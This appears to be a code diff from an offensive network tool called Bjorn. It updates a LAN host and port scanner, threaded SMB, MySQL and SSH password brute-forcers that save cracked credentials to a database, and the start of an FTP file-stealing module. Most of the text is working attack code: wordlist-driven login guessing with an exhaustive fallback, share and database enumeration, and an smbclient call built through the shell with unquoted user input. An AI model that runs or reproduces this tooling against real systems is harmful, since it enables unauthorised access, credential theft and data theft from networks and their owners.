if self.outer.shared_data.orchestrator_should_exit:
return
t = threading.Thread(target=self.scan_host, args=(host,))
t.start()
self.host_threads.append(t)
# per-host threads with bounded pool
max_threads = min(self.outer.max_host_threads, len(hosts)) if hosts else 1
with ThreadPoolExecutor(max_workers=max_threads) as pool:
futures = {}
for host in hosts:
if self.outer._should_stop():
break
f = pool.submit(self.scan_host, host)
futures[f] = host
# wait
for t in self.host_threads:
if self.outer.shared_data.orchestrator_should_exit:
return
t.join()
for f in as_completed(futures):
if self.outer._should_stop():
break
try:
f.result(timeout=30)
except Exception as e:
ip = futures.get(f, "?")
self.outer.logger.error(f"Host scan thread failed for {ip}: {e}")
self.outer.logger.info(
f"Host mapping completed: {self.outer.scanned_hosts}/{self.outer.total_hosts} processed, "
@@ -364,7 +435,10 @@ class NetworkScanner:
# mark unseen as alive=0
existing_macs = set(self.existing_map.keys())
for mac in existing_macs - self.seen_now:
self.outer.shared_data.db.update_host(mac_address=mac, alive=0)
try:
self.outer.shared_data.db.update_host(mac_address=mac, alive=0)
except Exception as e:
self.outer.logger.error(f"Failed to mark {mac} as dead: {e}")
# feed ip_data
for ip, hostname, mac in self.ip_hostname_list:
@@ -373,13 +447,19 @@ class NetworkScanner:
self.ip_data.mac_list.append(mac)
def scan_host(self, ip):
if self.outer.shared_data.orchestrator_should_exit:
if self.outer._should_stop():
return
if self.outer.blacklistcheck and ip in self.outer.ip_scan_blacklist:
return
try:
# ARP ping to help populate neighbor cache
os.system(f"arping -c 2 -w 2 {ip} > /dev/null 2>&1")
# ARP ping to help populate neighbor cache (subprocess with timeout)
try:
subprocess.run(
['arping', '-c', '2', '-w', str(self.outer.arping_timeout), ip],
capture_output=True, timeout=self.outer.arping_timeout + 2
)
except Exception:
pass
# Hostname (validated)
hostname = ""
@@ -393,7 +473,7 @@ class NetworkScanner:
self.outer.update_progress('host', 1)
return
time.sleep(1.0) # let ARP breathe
time.sleep(0.5) # let ARP breathe (reduced from 1.0 for RPi Zero speed)
mac = self.outer.get_mac_address(ip, hostname)
if mac:
@@ -431,10 +511,12 @@ class NetworkScanner:
if ip:
ips_set.add(ip)
# Update current hostname + track history
current_hn = ""
if hostname:
self.outer.shared_data.db.update_hostname(mac, hostname)
try:
self.outer.shared_data.db.update_hostname(mac, hostname)
except Exception as e:
self.outer.logger.error(f"Failed to update hostname for {mac}: {e}")
current_hn = hostname
else:
current_hn = (prev.get('hostnames') or "").split(';', 1)[0] if prev else ""
@@ -444,15 +526,18 @@ class NetworkScanner:
key=lambda x: tuple(map(int, x.split('.'))) if x.count('.') == 3 else (0, 0, 0, 0)
)) if ips_set else None
self.outer.shared_data.db.update_host(
mac_address=mac,
ips=ips_sorted,
hostnames=None,
alive=1,
ports=None,
vendor=vendor or (prev.get('vendor') if prev else ""),
essid=self.essid or (prev.get('essid') if prev else None)
)
try:
self.outer.shared_data.db.update_host(
mac_address=mac,
ips=ips_sorted,
hostnames=None,
alive=1,
ports=None,
vendor=vendor or (prev.get('vendor') if prev else ""),
essid=self.essid or (prev.get('essid') if prev else None)
)
except Exception as e:
self.outer.logger.error(f"Failed to update host {mac}: {e}")
# refresh local cache
self.existing_map[mac] = dict(
@@ -467,19 +552,26 @@ class NetworkScanner:
with self.outer.lock:
self.ip_hostname_list.append((ip, hostname or "", mac))
# Update comment params for live display
self.outer.shared_data.comment_params = {
"ip": ip, "mac": mac,
"hostname": hostname or "unknown",
"vendor": vendor or "unknown"
}
self.outer.logger.debug(f"MAC for {ip}: {mac} (hostname: {hostname or '-'})")
except Exception as e:
self.outer.logger.error(f"Error scanning host {ip}: {e}")
finally:
self.outer.update_progress('host', 1)
time.sleep(0.05)
time.sleep(0.02) # reduced from 0.05
def start(self):
if self.outer.shared_data.orchestrator_should_exit:
if self.outer._should_stop():
return
self.scan_network_and_collect()
if self.outer.shared_data.orchestrator_should_exit:
if self.outer._should_stop():
return
# init structures for ports
@@ -496,12 +588,22 @@ class NetworkScanner:
f"(+{len(self.extra_ports)} extra)"
)
# per-IP port scan (threads per port, original logic)
for idx, ip in enumerate(self.ip_data.ip_list, 1):
if self.outer.shared_data.orchestrator_should_exit:
if self.outer._should_stop():
return
worker = self.outer.PortScannerWorker(self.outer, ip, self.open_ports, self.portstart, self.portend, self.extra_ports)
# Update comment params for live display
self.outer.shared_data.comment_params = {
"ip": ip, "progress": f"{idx}/{total_targets}",
"ports_found": str(sum(len(v) for v in self.open_ports.values()))
}
worker = self.outer.PortScannerWorker(
self.outer, ip, self.open_ports,
self.portstart, self.portend, self.extra_ports
)
worker.run()
if idx % 10 == 0 or idx == total_targets:
found = sum(len(v) for v in self.open_ports.values())
self.outer.logger.info(
@@ -517,13 +619,27 @@ class NetworkScanner:
# ---------- orchestration ----------
def scan(self):
self.shared_data.orchestrator_should_exit = False
# Reset only local stop flag for this action. Never touch orchestrator_should_exit here.
self._stop_event.clear()
try:
if self.shared_data.orchestrator_should_exit:
if self._should_stop():
self.logger.info("Orchestrator switched to manual mode. Stopping scanner.")
return
now = time.time()
elapsed = now - self._last_scan_started if self._last_scan_started else 1e9
if elapsed < self.scan_min_interval_s:
remaining = int(self.scan_min_interval_s - elapsed)
self.logger.info_throttled(
f"Network scan skipped (min interval active, remaining={remaining}s)",
key="scanner_min_interval_skip",
interval_s=15.0,
)
return
self._last_scan_started = now
self.shared_data.bjorn_orch_status = "NetworkScanner"
self.shared_data.comment_params = {}
self.logger.info("Starting Network Scanner")
# network
@@ -535,6 +651,7 @@ class NetworkScanner:
return
self.shared_data.bjorn_status_text2 = str(network)
self.shared_data.comment_params = {"network": str(network)}
portstart = int(self.shared_data.portstart)
portend = int(self.shared_data.portend)
extra_ports = self.shared_data.portlist
@@ -547,21 +664,22 @@ class NetworkScanner:
ip_data, open_ports_by_ip, all_ports, alive_macs = result
if self.shared_data.orchestrator_should_exit:
if self._should_stop():
self.logger.info("Scan canceled before DB finalization.")
return
# push ports -> DB (merge by MAC). Only for IPs with known MAC.
# map ip->mac
# push ports -> DB (merge by MAC)
ip_to_mac = {ip: mac for ip, _, mac in zip(ip_data.ip_list, ip_data.hostname_list, ip_data.mac_list)}
# existing cache
existing_map = {h['mac_address']: h for h in self.shared_data.db.get_all_hosts()}
try:
existing_map = {h['mac_address']: h for h in self.shared_data.db.get_all_hosts()}
except Exception as e:
self.logger.error(f"DB get_all_hosts for port merge failed: {e}")
existing_map = {}
for ip, ports in open_ports_by_ip.items():
mac = ip_to_mac.get(ip)
if not mac:
# store to pending (no DB write)
slot = scanner.pending.setdefault(
ip,
{'hostnames': set(), 'ports': set(), 'first_seen': int(time.time()), 'essid': scanner.essid}
@@ -578,16 +696,19 @@ class NetworkScanner:
pass
ports_set.update(str(p) for p in (ports or []))
self.shared_data.db.update_host(
mac_address=mac,
ports=';'.join(sorted(ports_set, key=lambda x: int(x))),
alive=1
)
try:
self.shared_data.db.update_host(
mac_address=mac,
ports=';'.join(sorted(ports_set, key=lambda x: int(x))),
alive=1
)
except Exception as e:
self.logger.error(f"Failed to update ports for {mac}: {e}")
# Late resolution pass: try to resolve pending IPs before stats
# Late resolution pass
unresolved_before = len(scanner.pending)
for ip, data in list(scanner.pending.items()):
if self.shared_data.orchestrator_should_exit:
if self._should_stop():
break
try:
guess_hostname = next(iter(data['hostnames']), "")
@@ -595,25 +716,28 @@ class NetworkScanner:
guess_hostname = ""
mac = self.get_mac_address(ip, guess_hostname)
if not mac:
continue # still unresolved for this run
continue
mac = mac.lower()
vendor = self.mac_to_vendor(mac, scanner.vendor_map)
# create/update host now
self.shared_data.db.update_host(
mac_address=mac,
ips=ip,
hostnames=';'.join(data['hostnames']) or None,
vendor=vendor,
essid=data.get('essid'),
alive=1
)
if data['ports']:
try:
self.shared_data.db.update_host(
mac_address=mac,
ports=';'.join(str(p) for p in sorted(data['ports'], key=int)),
ips=ip,
hostnames=';'.join(data['hostnames']) or None,
vendor=vendor,
essid=data.get('essid'),
alive=1
)
if data['ports']:
self.shared_data.db.update_host(
mac_address=mac,
ports=';'.join(str(p) for p in sorted(data['ports'], key=int)),
alive=1
)
except Exception as e:
self.logger.error(f"Failed to resolve pending IP {ip}: {e}")
continue
del scanner.pending[ip]
if scanner.pending:
@@ -622,8 +746,13 @@ class NetworkScanner:
f"(resolved during late pass: {unresolved_before - len(scanner.pending)})"
)
# stats (alive, total ports, distinct vulnerabilities on alive)
rows = self.shared_data.db.get_all_hosts()
# stats
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
self.logger.error(f"DB get_all_hosts for stats failed: {e}")
rows = []
alive_hosts = [r for r in rows if int(r.get('alive') or 0) == 1]
all_known = len(rows)
@@ -641,12 +770,23 @@ class NetworkScanner:
except Exception:
vulnerabilities_count = 0
self.shared_data.db.set_stats(
total_open_ports=total_open_ports,
alive_hosts_count=len(alive_hosts),
all_known_hosts_count=all_known,
vulnerabilities_count=int(vulnerabilities_count)
)
try:
self.shared_data.db.set_stats(
total_open_ports=total_open_ports,
alive_hosts_count=len(alive_hosts),
all_known_hosts_count=all_known,
vulnerabilities_count=int(vulnerabilities_count)
)
except Exception as e:
self.logger.error(f"Failed to set stats: {e}")
# Update comment params with final stats
self.shared_data.comment_params = {
"alive_hosts": str(len(alive_hosts)),
"total_ports": str(total_open_ports),
"vulns": str(int(vulnerabilities_count)),
"network": str(network)
}
# WAL checkpoint + optimize
try:
@@ -661,7 +801,7 @@ class NetworkScanner:
self.logger.info("Network scan complete (DB updated).")
except Exception as e:
if self.shared_data.orchestrator_should_exit:
if self._should_stop():
self.logger.info("Orchestrator switched to manual mode. Gracefully stopping the network scanner.")
else:
self.logger.error(f"Error in scan: {e}")
@@ -673,7 +813,9 @@ class NetworkScanner:
def start(self):
if not self.running:
self.running = True
self.thread = threading.Thread(target=self.scan_wrapper, daemon=True)
self._stop_event.clear()
# Non-daemon so orchestrator can join it reliably (no orphan thread).
self.thread = threading.Thread(target=self.scan_wrapper, daemon=False)
self.thread.start()
logger.info("NetworkScanner started.")
@@ -683,25 +825,22 @@ class NetworkScanner:
finally:
with self.lock:
self.shared_data.bjorn_progress = ""
self.running = False
logger.debug("bjorn_progress reset to empty string")
def stop(self):
if self.running:
self.running = False
self.shared_data.orchestrator_should_exit = True
self._stop_event.set()
try:
if hasattr(self, "thread") and self.thread.is_alive():
self.thread.join()
self.thread.join(timeout=15)
except Exception:
pass
logger.info("NetworkScanner stopped.")
if __name__ == "__main__":
# SharedData must provide .db (BjornDatabase) and fields:
# default_network_interface, use_custom_network, custom_network,
# portstart, portend, portlist, blacklistcheck, mac/ip/hostname blacklists,
# bjorn_progress, bjorn_orch_status, bjorn_status_text2, orchestrator_should_exit.
from shared import SharedData
sd = SharedData()
scanner = NetworkScanner(sd)

View File

@@ -1,8 +1,8 @@
"""
smb_bruteforce.py SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles fournies par lorchestrateur (ip, port)
"""
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles fournies par l’orchestrateur (ip, port)
- IP -> (MAC, hostname) depuis DB.hosts
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
- Conserve la logique de queue/threads et les signatures. Plus de rich/progress.
"""
@@ -10,12 +10,13 @@ import os
import threading
import logging
import time
from subprocess import Popen, PIPE
from subprocess import Popen, PIPE, TimeoutExpired
from smb.SMBConnection import SMBConnection
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG)
@@ -47,19 +48,20 @@ class SMBBruteforce:
return self.smb_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed')."""
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SMBBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""Gère les tentatives SMB, la persistance DB et le mapping IP(MAC, Hostname)."""
"""Gère les tentatives SMB, la persistance DB et le mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
@@ -70,6 +72,7 @@ class SMBConnector:
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, share, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
@@ -115,8 +118,9 @@ class SMBConnector:
# ---------- SMB ----------
def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]:
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
try:
conn.connect(adresse_ip, 445)
conn.connect(adresse_ip, 445, timeout=timeout)
shares = conn.listShares()
accessible = []
for share in shares:
@@ -127,7 +131,7 @@ class SMBConnector:
accessible.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
logger.debug(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
try:
conn.close()
except Exception:
@@ -137,10 +141,22 @@ class SMBConnector:
return []
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
process = None
try:
process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
try:
stdout, stderr = process.communicate(timeout=timeout)
except TimeoutExpired:
try:
process.kill()
except Exception:
pass
try:
stdout, stderr = process.communicate(timeout=2)
except Exception:
stdout, stderr = b"", b""
if b"Sharename" in stdout:
logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L")
return self.parse_shares(stdout.decode(errors="ignore"))
@@ -150,6 +166,23 @@ class SMBConnector:
except Exception as e:
logger.error(f"Error executing '{cmd}': {e}")
return []
finally:
if process:
try:
if process.poll() is None:
process.kill()
except Exception:
pass
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
try:
if process.stderr:
process.stderr.close()
except Exception:
pass
@staticmethod
def parse_shares(smbclient_output: str) -> List[str]:
@@ -216,10 +249,13 @@ class SMBConnector:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "share": shares[0] if shares else ""}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
@@ -228,69 +264,82 @@ class SMBConnector:
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords)
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords) + len(dict_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
# Fallback smbclient -L si rien trouvé
if not success_flag[0]:
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
def run_primary_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in self.passwords:
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
return success_flag[0], self.results
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_primary_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SMB dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_primary_phase(fallback_passwords)
# Keep smbclient -L fallback on dictionary passwords only (cost control).
if not success_flag[0] and not self.shared_data.orchestrator_should_exit:
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in dict_passwords:
shares = self.smbclient_l(adresse_ip, user, password)
if self.progress is not None:
self.progress.advance(1)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(
f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L"
)
self.save_results()
self.removeduplicates()
success_flag[0] = True
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
# insère self.results dans creds (service='smb'), database = <share>
# insère self.results dans creds (service='smb'), database = <share>
for mac, ip, hostname, share, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
@@ -315,12 +364,12 @@ class SMBConnector:
self.results = []
def removeduplicates(self):
# plus nécessaire avec l'index unique; conservé pour compat.
# plus nécessaire avec l'index unique; conservé pour compat.
pass
if __name__ == "__main__":
# Mode autonome non utilisé en prod; on laisse simple
# Mode autonome non utilisé en prod; on laisse simple
try:
sd = SharedData()
smb_bruteforce = SMBBruteforce(sd)
@@ -329,3 +378,4 @@ if __name__ == "__main__":
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,9 +1,9 @@
"""
sql_bruteforce.py MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur
"""
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
- Succès -> DB.creds (service='sql', database=<db>)
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
- Succès -> DB.creds (service='sql', database=<db>)
- Conserve la logique (pymysql, queue/threads)
"""
@@ -16,6 +16,7 @@ from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
@@ -44,18 +45,20 @@ class SQLBruteforce:
return self.sql_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed')."""
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SQLBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IP(MAC, Hostname)."""
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
@@ -66,6 +69,7 @@ class SQLConnector:
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [ip, user, password, port, database, mac, hostname]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
@@ -109,16 +113,20 @@ class SQLConnector:
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SQL ----------
def sql_connect(self, adresse_ip: str, user: str, password: str):
def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = 3306):
"""
Connexion sans DB puis SHOW DATABASES; retourne (True, [dbs]) ou (False, []).
"""
timeout = int(getattr(self.shared_data, "sql_connect_timeout_s", 6))
try:
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
port=port,
connect_timeout=timeout,
read_timeout=timeout,
write_timeout=timeout,
)
try:
with conn.cursor() as cursor:
@@ -134,7 +142,7 @@ class SQLConnector:
logger.info(f"Available databases: {', '.join(databases)}")
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
logger.debug(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
# ---------- DB upsert fallback ----------
@@ -182,17 +190,20 @@ class SQLConnector:
adresse_ip, user, password, port = self.queue.get()
try:
success, databases = self.sql_connect(adresse_ip, user, password)
success, databases = self.sql_connect(adresse_ip, user, password, port=port)
if success:
with self.lock:
for dbname in databases:
self.results.append([adresse_ip, user, password, port, dbname])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "databases": str(len(databases))}
self.save_results()
self.remove_duplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
@@ -201,48 +212,56 @@ class SQLConnector:
def run_bruteforce(self, adresse_ip: str, port: int):
total_tasks = len(self.users) * len(self.passwords)
self.results = []
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, port))
self.queue.join()
for t in threads:
t.join()
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SQL dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
# pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
# pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
for ip, user, password, port, dbname in self.results:
mac = self.mac_for_ip(ip)
hostname = self.hostname_for_ip(ip) or ""
@@ -269,7 +288,7 @@ class SQLConnector:
self.results = []
def remove_duplicates(self):
# inutile avec lindex unique; conservé pour compat.
# inutile avec l’index unique; conservé pour compat.
pass
@@ -282,3 +301,4 @@ if __name__ == "__main__":
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -17,9 +17,11 @@ import socket
import threading
import logging
import time
from datetime import datetime
import datetime
from queue import Queue
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
# Configure the logger
@@ -38,7 +40,7 @@ b_port = 22
b_service = '["ssh"]'
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
b_parent = None
b_priority = 70
b_priority = 70 # tu peux ajuster la priorité si besoin
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
@@ -83,6 +85,7 @@ class SSHConnector:
self.lock = threading.Lock()
self.results = [] # List of tuples (mac, ip, hostname, user, password, port)
self.queue = Queue()
self.progress = None
# ---- Mapping helpers (DB) ------------------------------------------------
@@ -134,6 +137,7 @@ class SSHConnector:
"""Attempt to connect to SSH using (user, password)."""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
timeout = float(getattr(self.shared_data, "ssh_connect_timeout_s", timeout))
try:
ssh.connect(
@@ -244,9 +248,12 @@ class SSHConnector:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
@@ -260,48 +267,53 @@ class SSHConnector:
Called by the orchestrator with a single IP + port.
Builds the queue (users x passwords) and launches threads.
"""
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords)
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
# clear queue
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.queue.join()
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if any
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SSH dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
if __name__ == "__main__":

View File

@@ -108,20 +108,28 @@ class StealFilesFTP:
return out
# -------- FTP helpers --------
def connect_ftp(self, ip: str, username: str, password: str) -> Optional[FTP]:
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
# Max recursion depth for directory traversal (avoids symlink loops)
_MAX_DEPTH = 5
def connect_ftp(self, ip: str, username: str, password: str, port: int = b_port) -> Optional[FTP]:
try:
ftp = FTP()
ftp.connect(ip, b_port, timeout=10)
ftp.connect(ip, port, timeout=10)
ftp.login(user=username, passwd=password)
self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP as {username}")
logger.info(f"Connected to {ip}:{port} via FTP as {username}")
return ftp
except Exception as e:
logger.info(f"FTP connect failed {ip} {username}:{password}: {e}")
logger.info(f"FTP connect failed {ip}:{port} {username}: {e}")
return None
def find_files(self, ftp: FTP, dir_path: str) -> List[str]:
def find_files(self, ftp: FTP, dir_path: str, depth: int = 0) -> List[str]:
